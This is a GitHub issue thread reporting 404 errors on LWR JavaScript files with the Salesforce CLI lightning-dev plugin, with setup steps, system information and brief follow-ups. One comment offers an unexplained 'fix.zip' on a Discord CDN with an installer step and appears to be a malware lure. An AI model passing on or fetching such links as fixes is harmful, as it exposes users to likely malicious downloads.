### ISSUE TITLE
lightning-dev 1.1.0 - get 404 error on loading lwr js files with "sf lightning dev site"

### ISSUE THREAD

**Issue by Ewaken** [forcedotcom/cli#3001]
> **Note** 
> Before you submit your issue, make sure that:
> - You're using the latest version of Salesforce CLI.
> - You've searched both open and closed issues for related posts.
> - You've used the `doctor` command to diagnose common issues. 
> - You understand that GitHub Issues don't adhere to any agreement or SLA.
>   - If you require immediate assistance, use official channels such as Salesforce Customer Support.

### Summary
Hello, I wanted to try the new beta plugin "local dev" for the development for a new LWR experience cloud. So I tried to setup my project to make it works:
- I checked the "Local Dev" on my sandbox.
- I added some missing @lwrjs depedencies to my package.json: 
![image](https://github.com/user-attachments/assets/e0ec5ee2-a295-428e-adcb-fb92f361e0bd)
- I encountered a first problem with the lwc engine, I correct it (maybe wrongly) by updating the "LWC_VERSION" inside the "\app\site\dev\mrt\******\@lwc\engine-server.js" file generated by "sf lightning dev site": 
![image](https://github.com/user-attachments/assets/9abf2f19-dcd1-43dc-8dc9-941b4d75f717)
- Now, I have a 404 error on all lwr js files, I don't know why it looks for files on "/mobify/bundle/development/.localdev/..." and not directly on "/.localdev/...":
![image](https://github.com/user-attachments/assets/61a15a88-b105-4137-b66c-c94c56adb6c9)

### Steps To Reproduce
- run sf lightning dev site on a new LWR experience

### Expected result
No more 404 errors on lwr js files fetched

### Actual result
No errors on screen but errors on the browser dev console.

![image](https://github.com/user-attachments/assets/a0fbd249-cb24-42c1-9301-ca4804fdcc3d)

### System Information

```json
{
  "architecture": "win32-x64",
  "cliVersion": "@salesforce/cli/2.56.7",
  "nodeVersion": "node-v20.10.0",
  "osVersion": "Windows_NT 10.0.19045",
  "rootPath": "C:\\Users\\*******\\AppData\\Roaming\\npm\\node_modules\\@salesforce\\cli",
  "shell": "powershell",
  "pluginVersions": [
    "@oclif/plugin-autocomplete 3.2.0 (core)",
    "@oclif/plugin-commands 4.0.11 (core)",
    "@oclif/plugin-help 6.2.8 (core)",
    "@oclif/plugin-not-found 3.2.16 (core)",
    "@oclif/plugin-plugins 5.4.4 (core)",
    "@oclif/plugin-search 1.2.5 (core)",
    "@oclif/plugin-update 4.5.3 (core)",
    "@oclif/plugin-version 2.2.10 (core)",
    "@oclif/plugin-warn-if-update-available 3.1.11 (core)",
    "@oclif/plugin-which 3.2.10 (core)",
    "@salesforce/cli 2.56.7 (core)",
    "apex 3.4.2 (core)",
    "api 1.1.0 (core)",
    "auth 3.6.48 (core)",
    "community 3.2.29 (user) published 3 days ago (Sat Aug 31 2024)",
    "data 3.6.1 (core)",
    "deploy-retrieve 3.10.1 (core)",
    "info 3.3.29 (core)",
    "lightning-dev 1.1.0 (user) published 16 days ago (Sun Aug 18 2024)",
    "limits 3.3.25 (core)",
    "marketplace 1.2.22 (core)",
    "org 4.5.4 (core)",
    "packaging 2.8.0 (core)",
    "schema 3.3.24 (core)",
    "settings 2.3.13 (core)",
    "signups 2.5.9 (user) published 16 days ago (Sun Aug 18 2024) (latest is 2.5.12)",
    "sobject 1.4.29 (core)",
    "source 3.5.14 (core)",
    "telemetry 3.6.7 (core)",
    "templates 56.3.12 (core)",
    "trust 3.7.23 (core)",
    "user 3.5.25 (core)",
    "@salesforce/sfdx-plugin-lwc-test 1.2.0 (user) published 181 days ago (Tue Mar 05 2024)",
    "@salesforce/sfdx-scanner 4.2.0 (user) published 97 days ago (Tue May 28 2024) (latest is 4.5.0)"
  ]
}
```

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by lakshmakusam** [comment]
I ran into the same issue. It seems like the plugin's npm packages of the plugin are not being installed.

**Comment by Ewaken** [comment]
I close this issue because I opened a new one on the right repo: https://github.com/salesforcecli/plugin-lightning-dev/issues/165
